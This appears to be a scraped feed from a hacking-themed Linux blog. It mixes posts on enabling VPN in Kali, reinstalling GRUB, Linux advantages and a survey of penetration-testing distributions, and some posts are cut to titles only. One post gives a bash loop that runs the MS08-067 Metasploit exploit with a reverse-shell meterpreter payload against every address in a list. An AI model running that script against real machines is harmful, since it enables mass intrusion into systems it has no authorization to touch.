How To: Configure VPN in Kali Linux
A virtual private network (VPN) extends a private network across a public network, such as the Internet. It enables a computer to send and receive data across shared or public networks as if it is directly connected to the private network, while benefiting from the functionality, security and management policies of the private network A VPN is created by establishing a virtual point-to-point connection through the use of dedicated connections, virtual tunneling protocols, or traffic encryptions. On Kali Linux, by default VPN options are grayed out. This guide will show users how to install necessary packages to fix VPN grayed out issue and enable VPN on Kali Linux.
Why use VPN – benefits?
- VPN provides Privacy and cloaks your IP address.
- Use any network (public or private or free WiFi) with encryption
- Login to your home or Work network from anywhere with confidence.
- Bypass censorship and content monitoring.
- Browse and bypass Firewall and censorship policy at work or Anywhere!
- Access region restricted services from anywhere (i.e. Youtube videos, NetFlix or BBC Player etc.)
- Transfer or receive files with privacy.
- Hide your voice/VOIP calls.
- Use Search Engines while hiding some of your identity.
- Hide yourself
- Cause you like to be anonymous.
How To: Configure VPN in Kali Linux
linux
from iExplo1t http://ift.tt/1lwWOEz
How To Uninstall Linux from a Dual-Boot Windows using EasyBCD
But now, whenever you boot, you get an annoying GRUB menu asking you to select what OS you want to boot into, and you have to scramble to switch to Windows. Plus, you’ve got a swath of disk space you can’t use anymore because the Linux distro you don’t want any more is using it. Most people would advise using a EasyBCD.
How To Uninstall Linux from a Dual-Boot Windows using EasyBCD
linux, Windows
from iExplo1t http://ift.tt/1ACEC69
Kali Linux – Complete Re-install of GRUB from Live (CD/USB)
Hi all
This video tutorial will show you how you can use an Kali LiveCD / USB Drive to reinstall GRUB, even when your boot device is inaccessible, sometimes damaged by windows installations, or other OS’s
You have to know your Kali partition (GPARTED/fdisk -l) and mount it.
Commands used in this video:
mount the linux partition on /mnt
mount /dev/sda1 /mnt
Using the linux installation on your hard drive instead of /dev/sda1
mount (bind) the live CD dir with installed linux dir
mount –bind /dev /mnt/dev
mount –bind /proc /mnt/proc
mount –bind /sys /mnt/sys
Get the root privaleg
chroot /mnt
Install the Grub
grub (Type: TAB Twice)
grub-install /dev/sda ***** Using your boot device instead of /dev/sda
Update the Grub
grub-mkconfig -o boot/grub/grub.cfg
CTRL-D
umount /mnt/dev
umount /mnt/proc
umount /mnt/sys
umount /mnt
reboot
Contact Me : contact@iexplo1t.com
Follow Us
http://ift.tt/1nE0OI1; (Budget Equipment)
http://ift.tt/1l0Q2ui (For Extra Help)
Don’t forget to subscribe as it’s FREE.
http://ift.tt/1mJCaFZ
Kali Linux – Complete Re-install of GRUB from Live (CD/USB)
linux, Kali Linux
from iExplo1t http://ift.tt/1pBEN9g
20 Things that you can do with Linux but not with Mac or Windows
2. Have the latest version of the operating system run faster than the previous version on the same hardware
3. Easily install and run different graphical interfaces if I don’t like the default setup
4. Install twenty programs with one command
5. Have the system automatically update all my installed programs for me.
6. Install the same copy of my OS (Ubuntu) on multiple computers without worrying about license restrictions or activation keys
7. Give away copies of the operating system and other programs that run on it without breaking any laws, governmental or ethical or moral, because it was all intended to be used this way
8. Have full control over my computer hardware and know that there are no secret back doors in my software, put there by malicious software companies or governments
9. Run without using a virus scanner, adware/spyware protection, and not reboot my computer for months, even when I do keep up with all of the latest security updates
10. Run my computer without needing to defragment my hard drive, ever
11. Try out software, decide I don’t like it, uninstall it, and know that it didn’t leave little bits of stuff in a registry that can build up and slow down my machine
12. Make a major mistake that requires a complete reinstallation and be able to do it in less than an hour, because I put all of my data on a separate partition from the operating system and program files
13. Boot into a desktop with flash and effects as cool as Windows Vista on a three year old computer…in less than 40 seconds, including the time it takes me to type my username and password to login
14. Customize anything I want, legally, including my favorite programs. I can even track down the software developers to ask them questions, contribute ideas, and get involved in the actual design/software writing process if I want to
15. Have 4+ word processor windows open working on papers, listen to music, play with flashy desktop effects, have contact with a largely happy community and have firefox, instant messaging, and email clients all open at the same time, without ever having had to beg someone for a code to make my os work, and without the system running so slow it is useless
16. Use the command “dpkg –get-selections > pkg.list” to make a full, detailed list of all software I have installed, backup my /etc and /home directories on a separate partition, and you are able to recover your system any time, easily
17. Run multiple desktops simultaneously, or even allow multiple users to log in and use the computer simultaneously
18. Resize a hard disk partition without having to delete it and without losing the data on it
19. Use the same hardware for more than 5 years before it really needs to be replaced…I have some hardware that is nearly 10 years old, running Linux, and still useful
20. Browse the web while the OS is being installed!
21. Use almost any hardware and have a driver for it included with the operating system…eliminating the need to scour the internet to find the hardware manufacturer’s website to locate one
22. Get the source code for almost anything, including the OS kernel and most of my applications
20 Things that you can do with Linux but not with Mac or Windows
linux
from iExplo1t http://ift.tt/1xx8PB3
ArtistX – The Linux Distro for Artists
ArtistX – The Linux Distro for Artists
linux, articles
from iExplo1t http://ift.tt/1jfuDsM
Hack Multiple Systems with MSFCLI and Bash Scripting
Commands :
i=4444
for ip in $(cat iplist.txt)
do
gnome-terminal -x msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=$ip LHOST=192.168.1.8 LPORT=$i E
echo “Exploiting $ip and establishing reverse connection on local port $i”
i=$(($i+1))
done
Hack Multiple Systems with MSFCLI and Bash Scripting
linux, BackBox, Kali Linux, BackTrack
from iExplo1t http://ift.tt/1onDPCL
How To: Fix the GPG error in updater “NO_PUBKEY”
How To: Fix the GPG error in updater “NO_PUBKEY”
linux, BackBox, Kali Linux, BackTrack, Ubuntu
from iExplo1t http://ift.tt/1odghMF
How To Install Kali Tools in Linux Mint (Works for all versions!)
How To Install Kali Tools in Linux Mint (Works for all versions!)
Linux Mint, linux, BackBox, Kali Linux, BackTrack
from iExplo1t http://ift.tt/1jezq0y
How To: Install Flareget in Kali Linux (Best Downlaod Manager)
How To: Install Flareget in Kali Linux (Best Downlaod Manager)
linux, BackBox, Kali Linux, BackTrack
from iExplo1t http://ift.tt/1oAxS4l
TOP 13 PENETRATION TESTING LINUX DISTRIBUTIONS
The mamma or best known of Linux pentesting distros. BackTrack has a very cool strapline: “The quieter you become, the more you are able to hear.” That just sounds cool….
dnmap – Distributed NMap
address6 – (which acts as a IPV6 address conversion)
Jigsaw – Grabs information about company employees
Uberharvest – Email harvester
sslcaudit – SSL Cert audit
VoIP honey – VoIP Honeypot
urlcrazy – Detects URL typos used in typo squatting, url hijacking, phishing
Apache_users – Apache username enumerator
Deblaze – Performs enumeration and interrogation against Flash remote end points
Tnscmd10g – Allows you to inject commands into Oracle
BBQSQL – Blind SQL injection toolkit
* If you are interested in Database Security see our Hacker Halted summary here.
Blueranger – Uses link quality to locate Bluetooth devices
Lynis – Scans systems & software for security issues
DotDotPwn – Directory Traversal fuzzer
Netgear-telnetable – Enables Telnet console on Netgear devices
Terminator – Smart Meter tester
Htexploit – Tool to bypass standard directory protection
Jboss-Autopwn – Deploys JSP shell on target JBoss servers
Websploit – Scans & analyses remote systems for vulnerabilities
Bluepot – Bluetooth honeypot
Spooftooph – Spoofs or clones Bluetooth devices
Smartphone-Pentest-Framework
Fern-Wifi-cracker – Gui for testing Wireless encryption strength
Wi-fihoney – Creates fake APs using all encryption and monitors with Airodump
Wifite – Automated wireless auditor
Creddump
Johnny
Manglefizz
Ophcrack
Phrasendresher
Rainbowcrack
Acccheck
smbexec
Like BackTrack, NodeZero is an Ubuntu based distro used for penetration testing using repositories so every time Ubuntu releases a patch for its bugs, you also are notified for system updates or upgrades. Node Zero used to be famous for its inclusion of THC IPV6 Attack Toolkit which includes tools like alive6, detect-new-ip6, dnsdict6, etc, but I think that these days BackTrack 5r3 also includes these tools.
BackBox is getting more popular by the day. Like BackTrack and NodeZero, BackBox Linux is an Ubuntu-based distribution developed to perform penetration tests and security assessments. The developers state that the intention with BackBox is to create a pentesting distro that is fast and easy to use. BackBox does have a pretty concise looking desktop environment and seems to work very well. Like the other distros BackBox is always updated to the latest stable versions of the most often used and best-known ethical hacking tools through repositories.
Yes, as the name clearly suggests, this is yet another distro that is based on Ubuntu. Here is a list of Security and Penetration Testing tools – or rather categories available within the Blackbuntu package, (each category has many sub categories) but this gives you a general idea of what comes with this pentesting distro: Information Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis, Digital Forensic, Reverse Engineering and a Miscellaneous section. This list is hardly revolutionary but the tools contained within might be different to the other distros.
This is a live Linux distro that has been pre-configured with some of the best of open source and free tools that focus on testing and attacking websites. (The difference with Samurai Web Testing Framework is that it focuses on attacking (and therefore being able to defend) websites. The developers outline four steps of a web pen-test. These steps are incorporated within the distro and contain the necessary tools to complete the task.
Step 1: Reconnaissance – Tools include Fierce domain scanner and Maltego.
Step 2: Mapping – Tools include WebScarab and ratproxy.
Step 3: Discovery – Tools include w3af and burp.
Step 4: Exploitation – Tools include BeEF, AJAXShell and much more.
This distro is based on Debian and originated in Germany. The architecture is i486 and runs from the following desktops: GNOME, KDE, LXDE and also Openbox. Knoppix has been around for a long time now – in fact I think it was one of the original live distros.
Pentoo is a security-focused live CD based on Gentoo. In their own words “Pentoo is Gentoo with the pentoo overlay.” So, if you are into Pentoo then this is the distro for you. Their homepage lists some of their customized tools and kernel, including: a Hardened Kernel with aufs patches, Backported Wifi stack from latest stable kernel release, Module loading support ala slax, XFCE4 wm and Cuda/OPENCL cracking support with development tools.
9. WEAKERTH4N.
This penetration distribution is built from Debian Squeeze and uses Fluxbox for its’ desktop environment. This pentesting distro is particularly well adjusted for WiFi hacking since it contains many Wireless tools. Here is a quick summary of WEAKERTH4N’s tool categories: Wifi attacks, SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering, Information Gathering, Fuzzing, Android Hacking, Networking and Shells.
10. Matriux Krypton.
This linux distro is, I believe, is the first security distribution based directly on Debian, (after WEAKERTH4N?) if I am wrong please comment below! There are 300 security tools to work, called “arsenals”. The arsenals allow for penetration testing, ethical hacking, system and network administration, security testing, vulnerability analysis, cyber forensics investigations, exploiting, cracking and data recovery. The last category, data recovery, doesn’t seem to be prevalent in the other distros.
The latest version is DEFT 7 which is based on the new Linux Kernel 3 and the DART (Digital Advanced Response Toolkit). This distro is more orientated towards Computer Forensics and uses LXDE as desktop environment and WINE for executing Windows tools under Linux. The developers, (based in Italy) hope that their distro will be used by the Military, Police, Investigators, IT Auditors and professional penetration testers. DEFT is an abbreviation for “Digital Evidence & Forensic Toolkit”
A reader to our blog suggested to add CAINE which we duly have. CAINE Stands for Computer Aided Investigative Environment, and like many information security products and tools – it is Italian GNU/Linux live distribution. CAINE offers a comprehensive forensic environment that is organized to integrate existing software tools that are composed as software modules, all displayed within a friendly graphical interface. CAINE states to have three objectives. These are, to ensure that the distro works in an interoperable environment that supports the digital investigator during the four phases of the digital investigation. Secondly that the distro has a user friendly graphical interface and finally that it provides a semi-automated compilation of the final forensic report. As you would likely expect, CAINE is fully open-source.
Bugtraq is another reader submitted pentesting distro. Based on the 26.6.38 kernel, this distro offers a really wide range of penetration and forensic tools. Like most of the others in this list, Bugtraq can hard-install of obviously run as a Live DVD or from a USB drive. Bugtraq claims to have recently configured and updated the kernel for better performance but also importantly so that it can recognize more hardware, including wireless injection patches pentesting. The team at Bugtraq seem solid because they are clearly making an effort to get the kernel to work with more hardware – something which the other distributions don’t always place enough importance.
TOP 13 PENETRATION TESTING LINUX DISTRIBUTIONS
linux, BackBox, Kali Linux, BackTrack, articles, Ubuntu
from iExplo1t http://ift.tt/1nBMY72